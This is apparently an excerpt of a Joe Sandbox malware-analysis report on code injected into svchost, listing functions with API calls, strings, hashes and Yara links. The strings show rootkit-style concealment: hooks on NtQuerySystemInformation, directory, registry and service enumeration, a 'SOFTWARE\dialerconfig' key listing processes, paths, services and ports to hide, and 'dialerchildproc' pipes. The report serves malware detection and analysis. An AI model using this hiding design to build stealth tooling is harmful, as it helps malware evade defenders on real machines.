Instruction ID: 49fe3da7658472f80655a8590b1efea23276f7a9504431454da11e10ce33b624
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 8CB1CF32A28A6482FB6A8F65D4547E9A3B5F746B8CF545017EE4D53B94EF34CC88C340

Function 0000017953D42CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000017953D42D80
lstrlenW.KERNEL32 ref: 0000017953D42FBA

Part of subcall function 0000017953D41A14: OpenProcess.KERNEL32 ref: 0000017953D41A3A
Part of subcall function 0000017953D41A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000017953D41A58
Part of subcall function 0000017953D41A14: PathFindFileNameW.SHLWAPI ref: 0000017953D41A67
Part of subcall function 0000017953D41A14: lstrlenW.KERNEL32 ref: 0000017953D41A73
Part of subcall function 0000017953D41A14: StrCpyW.SHLWAPI ref: 0000017953D41A86
Part of subcall function 0000017953D41A14: CloseHandle.KERNEL32 ref: 0000017953D41A94

GetProcAddress.KERNEL32 ref: 0000017953D42D95

Part of subcall function 0000017953D41554: StrCmpIW.SHLWAPI ref: 0000017953D41585

Part of subcall function 0000017953D43930: StrCmpNIW.SHLWAPI ref: 0000017953D43948

StrCmpNIW.SHLWAPI ref: 0000017953D42DD8
lstrlenW.KERNEL32 ref: 0000017953D42F00

Strings

\Device\Nsi, xrefs: 0000017953D42DCB
NtQueryObject, xrefs: 0000017953D42D8B
ntdll.dll, xrefs: 0000017953D42D79

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 98bcc10a1d13680acb4732322f851b0dccb3f31070d55a33c753f57472592aee
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: CDB17E72218AB082EB6A9F6AD4407E9A3B4FB44B8CF545027EE4D53B94DFB5CD58C340

Function 00000179537A7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000179537A7E8C
RtlCaptureContext.NTDLL ref: 00000179537A7EB9
RtlLookupFunctionEntry.NTDLL ref: 00000179537A7ED3
RtlVirtualUnwind.NTDLL ref: 00000179537A7F14
IsDebuggerPresent.KERNEL32 ref: 00000179537A7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000179537A7F89
UnhandledExceptionFilter.KERNEL32 ref: 00000179537A7F94

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: e8bfa415f41d31c475037110bcc008507386401fbc5a7cc04ea91d7088d21a7c
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 25317072618B9096EB618FA0E8507EE7371F789748F44442BDA4D47B98EF38C64CC710

Function 0000017953D47E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000017953D47E8C
RtlCaptureContext.NTDLL ref: 0000017953D47EB9
RtlLookupFunctionEntry.NTDLL ref: 0000017953D47ED3
RtlVirtualUnwind.NTDLL ref: 0000017953D47F14
IsDebuggerPresent.KERNEL32 ref: 0000017953D47F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017953D47F89
UnhandledExceptionFilter.KERNEL32 ref: 0000017953D47F94

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 9ae1a63d25a466f5e47e171da770538db26f358e0c8647ac2f9f06c02c70e1b6
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 57316072209B909AEB619F60E8407ED73B4F794748F44452BDA5E47B98EF78C64CC710

Function 00000179537AB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000179537AB585
RtlLookupFunctionEntry.NTDLL ref: 00000179537AB59D
RtlVirtualUnwind.NTDLL ref: 00000179537AB5D8
IsDebuggerPresent.KERNEL32 ref: 00000179537AB611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000179537AB61B
UnhandledExceptionFilter.KERNEL32 ref: 00000179537AB626

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: ba80b338ea6e5c069091e1c0105fe7063c03fcc6fd82a0caca0eb8104bb9595a
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 17319E32618F9096EB61CF65E8503DE73B4F78A758F540126EA9D43BA8EF38C549CB00

Function 0000017953D4B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000017953D4B585
RtlLookupFunctionEntry.NTDLL ref: 0000017953D4B59D
RtlVirtualUnwind.NTDLL ref: 0000017953D4B5D8
IsDebuggerPresent.KERNEL32 ref: 0000017953D4B611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000017953D4B61B
UnhandledExceptionFilter.KERNEL32 ref: 0000017953D4B626

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 97b7bee9a0292e194b785b80e9bb23aa859324820fdf5215c23d676d039cdd79
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: CC315C32218F9086EB61CF65E8403DE73B4F798798F540126EA9D47BA9DF78C659CB00

Function 00000179537AFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000179537AFF67
WriteFile.KERNEL32 ref: 00000179537B021E
WriteFile.KERNEL32 ref: 00000179537B0270
GetLastError.KERNEL32 ref: 00000179537B0372
GetLastError.KERNEL32 ref: 00000179537B03D2

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: ee1056d205be9449170eb33c58af6fcd7c72c5137feb072d1d733fa74b030031
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 16E1FF32B18AA09AE712CF64D4942DE7BB1F34678CF144517EE8E57B99EB38C51AC700

Function 0000017953D4FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000017953D4FF67
WriteFile.KERNEL32 ref: 0000017953D5021E
WriteFile.KERNEL32 ref: 0000017953D50270
GetLastError.KERNEL32 ref: 0000017953D50372
GetLastError.KERNEL32 ref: 0000017953D503D2

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 3e79a1f4e444d1215e756465a9d7d2c36ed9f47f4af8cafd44822515662ecaf4
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 19E1CC72B18AA09AE712CF64D4842EE7BB1F3457CCF148516EE8E57B99DA38C51AC700

Function 00000179537A1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000179537A165B
HeapAlloc.KERNEL32 ref: 00000179537A166A

Part of subcall function 00000179537A1274: GetProcessHeap.KERNEL32 ref: 00000179537A127A
Part of subcall function 00000179537A1274: HeapAlloc.KERNEL32 ref: 00000179537A1289
Part of subcall function 00000179537A1274: GetProcessHeap.KERNEL32 ref: 00000179537A12A3
Part of subcall function 00000179537A1274: HeapAlloc.KERNEL32 ref: 00000179537A12B4

RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DA
RegOpenKeyExW.ADVAPI32 ref: 00000179537A1707
RegCloseKey.ADVAPI32 ref: 00000179537A1721
RegOpenKeyExW.ADVAPI32 ref: 00000179537A1741
RegCloseKey.ADVAPI32 ref: 00000179537A175C
RegOpenKeyExW.ADVAPI32 ref: 00000179537A177C
RegCloseKey.ADVAPI32 ref: 00000179537A1797
RegOpenKeyExW.ADVAPI32 ref: 00000179537A17B7
RegCloseKey.ADVAPI32 ref: 00000179537A17D2
RegOpenKeyExW.ADVAPI32 ref: 00000179537A17F2
RegCloseKey.ADVAPI32 ref: 00000179537A180D
RegOpenKeyExW.ADVAPI32 ref: 00000179537A182D
RegCloseKey.ADVAPI32 ref: 00000179537A1848
RegOpenKeyExW.ADVAPI32 ref: 00000179537A1868
RegCloseKey.ADVAPI32 ref: 00000179537A1883
RegOpenKeyExW.ADVAPI32 ref: 00000179537A18A3
RegCloseKey.ADVAPI32 ref: 00000179537A18BE
RegCloseKey.ADVAPI32 ref: 00000179537A18C8

Part of subcall function 00000179537A12C8: RegQueryInfoKeyW.ADVAPI32 ref: 00000179537A1326
Part of subcall function 00000179537A12C8: GetProcessHeap.KERNEL32 ref: 00000179537A1334
Part of subcall function 00000179537A12C8: HeapAlloc.KERNEL32 ref: 00000179537A1345
Part of subcall function 00000179537A12C8: RegEnumValueW.ADVAPI32 ref: 00000179537A13A1
Part of subcall function 00000179537A12C8: GetProcessHeap.KERNEL32 ref: 00000179537A13E9
Part of subcall function 00000179537A12C8: HeapAlloc.KERNEL32 ref: 00000179537A13F7
Part of subcall function 00000179537A12C8: GetProcessHeap.KERNEL32 ref: 00000179537A141B
Part of subcall function 00000179537A12C8: HeapFree.KERNEL32 ref: 00000179537A1429
Part of subcall function 00000179537A12C8: lstrlenW.KERNEL32 ref: 00000179537A1432
Part of subcall function 00000179537A12C8: GetProcessHeap.KERNEL32 ref: 00000179537A1440
Part of subcall function 00000179537A12C8: HeapAlloc.KERNEL32 ref: 00000179537A144E

Strings

paths, xrefs: 00000179537A17B0
tcp_local, xrefs: 00000179537A1826
pid, xrefs: 00000179537A173A
process_names, xrefs: 00000179537A1775
udp, xrefs: 00000179537A189C
startup, xrefs: 00000179537A16FD
SOFTWARE\dialerconfig, xrefs: 00000179537A16BA
tcp_remote, xrefs: 00000179537A1861
service_names, xrefs: 00000179537A17EB

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 4a52f6432ecd7d29496339e7aee66de67061697f76576b81f9c784fbe780843a
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: D7710D36B14A6885FB129F66E8606D937B5FB86B8CF405122DE4D57B68EF38C489C700

Function 0000017953D41650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000017953D4165B
HeapAlloc.KERNEL32 ref: 0000017953D4166A

Part of subcall function 0000017953D41274: GetProcessHeap.KERNEL32 ref: 0000017953D4127A
Part of subcall function 0000017953D41274: HeapAlloc.KERNEL32 ref: 0000017953D41289
Part of subcall function 0000017953D41274: GetProcessHeap.KERNEL32 ref: 0000017953D412A3
Part of subcall function 0000017953D41274: HeapAlloc.KERNEL32 ref: 0000017953D412B4

RegOpenKeyExW.ADVAPI32 ref: 0000017953D416DA
RegOpenKeyExW.ADVAPI32 ref: 0000017953D41707
RegCloseKey.ADVAPI32 ref: 0000017953D41721
RegOpenKeyExW.ADVAPI32 ref: 0000017953D41741
RegCloseKey.ADVAPI32 ref: 0000017953D4175C
RegOpenKeyExW.ADVAPI32 ref: 0000017953D4177C
RegCloseKey.ADVAPI32 ref: 0000017953D41797
RegOpenKeyExW.ADVAPI32 ref: 0000017953D417B7
RegCloseKey.ADVAPI32 ref: 0000017953D417D2
RegOpenKeyExW.ADVAPI32 ref: 0000017953D417F2
RegCloseKey.ADVAPI32 ref: 0000017953D4180D
RegOpenKeyExW.ADVAPI32 ref: 0000017953D4182D
RegCloseKey.ADVAPI32 ref: 0000017953D41848
RegOpenKeyExW.ADVAPI32 ref: 0000017953D41868
RegCloseKey.ADVAPI32 ref: 0000017953D41883
RegOpenKeyExW.ADVAPI32 ref: 0000017953D418A3
RegCloseKey.ADVAPI32 ref: 0000017953D418BE
RegCloseKey.ADVAPI32 ref: 0000017953D418C8

Part of subcall function 0000017953D412C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000017953D41326
Part of subcall function 0000017953D412C8: GetProcessHeap.KERNEL32 ref: 0000017953D41334
Part of subcall function 0000017953D412C8: HeapAlloc.KERNEL32 ref: 0000017953D41345
Part of subcall function 0000017953D412C8: RegEnumValueW.ADVAPI32 ref: 0000017953D413A1
Part of subcall function 0000017953D412C8: GetProcessHeap.KERNEL32 ref: 0000017953D413E9
Part of subcall function 0000017953D412C8: HeapAlloc.KERNEL32 ref: 0000017953D413F7
Part of subcall function 0000017953D412C8: GetProcessHeap.KERNEL32 ref: 0000017953D4141B
Part of subcall function 0000017953D412C8: HeapFree.KERNEL32 ref: 0000017953D41429
Part of subcall function 0000017953D412C8: lstrlenW.KERNEL32 ref: 0000017953D41432
Part of subcall function 0000017953D412C8: GetProcessHeap.KERNEL32 ref: 0000017953D41440
Part of subcall function 0000017953D412C8: HeapAlloc.KERNEL32 ref: 0000017953D4144E

Strings

tcp_local, xrefs: 0000017953D41826
udp, xrefs: 0000017953D4189C
service_names, xrefs: 0000017953D417EB
process_names, xrefs: 0000017953D41775
SOFTWARE\dialerconfig, xrefs: 0000017953D416BA
tcp_remote, xrefs: 0000017953D41861
paths, xrefs: 0000017953D417B0
startup, xrefs: 0000017953D416FD
pid, xrefs: 0000017953D4173A

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 71312e77df608c7ffac4e76f1603aefdbc2ca8ceb81599fa74447b51014c12ec
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 38710836314B6086EB129F66E8907D927F4FB88B8DF405112DE4D97B28EF78C558C700

Function 00000179537A12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000179537A1326
GetProcessHeap.KERNEL32 ref: 00000179537A1334
HeapAlloc.KERNEL32 ref: 00000179537A1345
RegEnumValueW.ADVAPI32 ref: 00000179537A13A1

Part of subcall function 00000179537A1554: StrCmpIW.SHLWAPI ref: 00000179537A1585

GetProcessHeap.KERNEL32 ref: 00000179537A13E9
HeapAlloc.KERNEL32 ref: 00000179537A13F7
GetProcessHeap.KERNEL32 ref: 00000179537A141B
HeapFree.KERNEL32 ref: 00000179537A1429
lstrlenW.KERNEL32 ref: 00000179537A1432
GetProcessHeap.KERNEL32 ref: 00000179537A1440
HeapAlloc.KERNEL32 ref: 00000179537A144E
StrCpyW.SHLWAPI ref: 00000179537A1470
GetProcessHeap.KERNEL32 ref: 00000179537A1485
HeapFree.KERNEL32 ref: 00000179537A1493

Strings

d, xrefs: 00000179537A1365

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 242f178902969ed05e7db39c4f9884770abd5e876cc59087611c71ca94d681af
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: D651A072A18B5493FB11CFA6E45439AB3B5F78AB88F448126DB4D47B14EF38D499CB00

Function 0000017953D412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017953D41326
GetProcessHeap.KERNEL32 ref: 0000017953D41334
HeapAlloc.KERNEL32 ref: 0000017953D41345
RegEnumValueW.ADVAPI32 ref: 0000017953D413A1

Part of subcall function 0000017953D41554: StrCmpIW.SHLWAPI ref: 0000017953D41585

GetProcessHeap.KERNEL32 ref: 0000017953D413E9
HeapAlloc.KERNEL32 ref: 0000017953D413F7
GetProcessHeap.KERNEL32 ref: 0000017953D4141B
HeapFree.KERNEL32 ref: 0000017953D41429
lstrlenW.KERNEL32 ref: 0000017953D41432
GetProcessHeap.KERNEL32 ref: 0000017953D41440
HeapAlloc.KERNEL32 ref: 0000017953D4144E
StrCpyW.SHLWAPI ref: 0000017953D41470
GetProcessHeap.KERNEL32 ref: 0000017953D41485
HeapFree.KERNEL32 ref: 0000017953D41493

Strings

d, xrefs: 0000017953D41365

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: ec305540d5351e85b1c7146019941ee1ba0fc960e6281679760cb06f6ee96119
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 4D515A72618B5493EB16DFA2F54879AB3B1F788B88F048126DE9D07B14DF78C069C700

Function 00000179537A1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000179537A1EBF

Part of subcall function 00000179537A2174: GetModuleHandleA.KERNEL32 ref: 00000179537A218C
Part of subcall function 00000179537A2174: GetProcAddress.KERNEL32 ref: 00000179537A219D

Part of subcall function 00000179537A5C10: GetCurrentThreadId.KERNEL32 ref: 00000179537A5C4B

Strings

NtEnumerateValueKey, xrefs: 00000179537A1F76
NtQuerySystemInformation, xrefs: 00000179537A1EE5
NtEnumerateKey, xrefs: 00000179537A1F59
sechost.dll, xrefs: 00000179537A1FD9
NtDeviceIoControlFile, xrefs: 00000179537A1FF6
NtQueryDirectoryFileEx, xrefs: 00000179537A1F3C
NtQueryDirectoryFile, xrefs: 00000179537A1F1F
advapi32.dll, xrefs: 00000179537A1F97, 00000179537A1FB8
EnumServiceGroupW, xrefs: 00000179537A1F90
ntdll.dll, xrefs: 00000179537A1ECD
EnumServicesStatusExW, xrefs: 00000179537A1FB1, 00000179537A1FD2
NtResumeThread, xrefs: 00000179537A1F02

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: f26b529a3a280a1e3bc0626f675bd49583e0889ff9157c4ab1e27ec038f586aa
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: FE31B270E29A6AA0FB47FF64E8616D42371B74634CFC05423E91E13765AE38C68DCB90

Function 0000017953D41EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000017953D41EBF

Part of subcall function 0000017953D42174: GetModuleHandleA.KERNEL32 ref: 0000017953D4218C
Part of subcall function 0000017953D42174: GetProcAddress.KERNEL32 ref: 0000017953D4219D

Part of subcall function 0000017953D45C10: GetCurrentThreadId.KERNEL32 ref: 0000017953D45C4B

Strings

advapi32.dll, xrefs: 0000017953D41F97, 0000017953D41FB8
EnumServicesStatusExW, xrefs: 0000017953D41FB1, 0000017953D41FD2
NtQueryDirectoryFileEx, xrefs: 0000017953D41F3C
NtEnumerateValueKey, xrefs: 0000017953D41F76
EnumServiceGroupW, xrefs: 0000017953D41F90
sechost.dll, xrefs: 0000017953D41FD9
NtResumeThread, xrefs: 0000017953D41F02
NtDeviceIoControlFile, xrefs: 0000017953D41FF6
NtQuerySystemInformation, xrefs: 0000017953D41EE5
ntdll.dll, xrefs: 0000017953D41ECD
NtEnumerateKey, xrefs: 0000017953D41F59
NtQueryDirectoryFile, xrefs: 0000017953D41F1F

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: e0670c5afb079ca168297aa4a043527467c165bc8ce63d54b4a0a75049b55e22
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: A73192B0218A7AA1FB17EFA5E8516E423B1BB9438CFC05513A51D13966DFBCC64DC780

Function 00000179537A23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000179537A2405
GetCurrentProcessId.KERNEL32 ref: 00000179537A240F

Part of subcall function 00000179537A19AC: OpenProcess.KERNEL32 ref: 00000179537A19CA
Part of subcall function 00000179537A19AC: IsWow64Process.KERNEL32 ref: 00000179537A19E0
Part of subcall function 00000179537A19AC: CloseHandle.KERNEL32 ref: 00000179537A19FB

CreateFileW.KERNEL32 ref: 00000179537A2468
WriteFile.KERNEL32 ref: 00000179537A2490
ReadFile.KERNEL32 ref: 00000179537A24AF
CloseHandle.KERNEL32 ref: 00000179537A24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 00000179537A243F
\\.\pipe\dialerchildproc64, xrefs: 00000179537A2438

Memory Dump Source

Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 7ee9d80e101d04651c30a2cd6f7255030bf4b4242cf91b5e4f1f18af3282e3a0
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 25214F36A1CB5493F7119B65F45439A73B1F78ABA8F504216EA9D02BA8DF3CC58DCB00

Function 0000017953D423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000017953D42405
GetCurrentProcessId.KERNEL32 ref: 0000017953D4240F

Part of subcall function 0000017953D419AC: OpenProcess.KERNEL32 ref: 0000017953D419CA
Part of subcall function 0000017953D419AC: IsWow64Process.KERNEL32 ref: 0000017953D419E0
Part of subcall function 0000017953D419AC: CloseHandle.KERNEL32 ref: 0000017953D419FB

CreateFileW.KERNEL32 ref: 0000017953D42468
WriteFile.KERNEL32 ref: 0000017953D42490
ReadFile.KERNEL32 ref: 0000017953D424AF
CloseHandle.KERNEL32 ref: 0000017953D424B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000017953D4243F
\\.\pipe\dialerchildproc64, xrefs: 0000017953D42438

Memory Dump Source

Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 20ff23a6c584c0ddb20fd73cb4a68275a69abc2f68d636e31bf4ae53be9b85fd
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
